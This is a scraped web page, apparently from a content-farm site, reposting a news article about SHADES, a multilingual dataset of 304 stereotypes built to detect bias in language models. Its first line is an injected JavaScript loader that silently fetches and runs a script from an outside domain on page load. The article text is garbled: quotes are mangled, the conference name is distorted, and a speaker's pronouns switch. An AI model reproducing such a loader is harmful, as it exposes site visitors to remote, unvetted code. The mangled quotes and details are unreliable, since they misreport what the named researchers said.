(function(d,z,s){s.src='https://'+d+'/401/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('gizokraijaw.net',9335801,document.createElement('script')) This data set helps researchers spot harmful stereotypes in LLMs - news.adtechsolutions ​​​​​​​​​​​​​​​​​         

Physical Address

304 North Cardinal St.
Dorchester Center, MA 02124

This data set helps researchers spot harmful stereotypes in LLMs


“I hope people will use [SHADES] As a diagnostic tool to recognize where and how I can be problems in the model, “Talat says.” This is a way of knowing what is missing from the model, where we cannot be sure that the model works well and whether it is correct or not. “

In order to create a multilingual set of data, the team recruited domestic and fluent speakers of language, including Arabic, Chinese and Dutch. They translated and wrote down all stereotypes that they could think of in their languages, then checked by another original speaker. Each stereotype recorded speakers with regions in which he was recognized, a group of people to which he aimed and the type of bias he contained.

Each stereotype translated the participants into English – a language spoken by every associate – before they translated it into additional languages. The speakers then noticed if the translated stereotype was recognized in their language, creating a total of 304 stereotypes associated with the physical appearance of people, personal identity and social factors like their profession.

The team should be present his findings At the annual conference of the Nations of the chapter of America at the Association for Computer Linguistics in May.

“It’s an exciting approach,” says Myra Cheng, a doctoral student at Stanford University who studies social bias in AI. “It is good to cover different languages ​​and cultures that reflect their subtlety and shade.”

Mitchell says he hopes other associates will add new languages, stereotypes and regions in shades, which is publicly availablewhich leads to the development of better language models in the future. “It was a huge collaborative effort of people who want to help better technology,” she says.



Source link

Leave a Reply

Your email address will not be published. Required fields are marked *